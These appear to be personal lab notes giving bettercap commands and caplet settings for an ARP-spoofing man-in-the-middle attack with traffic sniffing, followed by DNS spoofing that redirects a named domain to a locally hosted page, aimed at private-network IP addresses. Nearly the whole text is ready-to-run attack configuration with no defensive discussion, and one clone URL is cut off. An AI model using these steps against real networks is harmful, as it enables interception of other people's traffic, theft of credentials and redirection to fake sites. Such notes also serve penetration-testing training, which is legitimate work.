arp spoofing

unzip bettercap_linux
apt-get install libnetfilter-queue-dev libpcap-dev
cd bettercap
./bettercap --version
nano spoof.cap
	net.probe on
	set arp.spoof.fullduplex  true
	set arp.spoof.targets 192.168.80.145
	arp spoof on

	set net.sniff.local true
	net.sniff on

./bettercap -iface ens33 -caplet spoof.cap

------------------------------------------------------------------------------------------------------------------
dns spoofing
put index.html in /var/www/html
git clone https://github.com/vam
nano spoof.cap
	net.probe on
	set arp.spoof.fullduplex true
	set arp.spoof.targets 192.168.80.120
	arp spoof on	
	set net.sniff.local true
	net.sniff on
	set dns.spoof.all true
	set dns.spoof.domains  iacsd.com
	dns.spoof on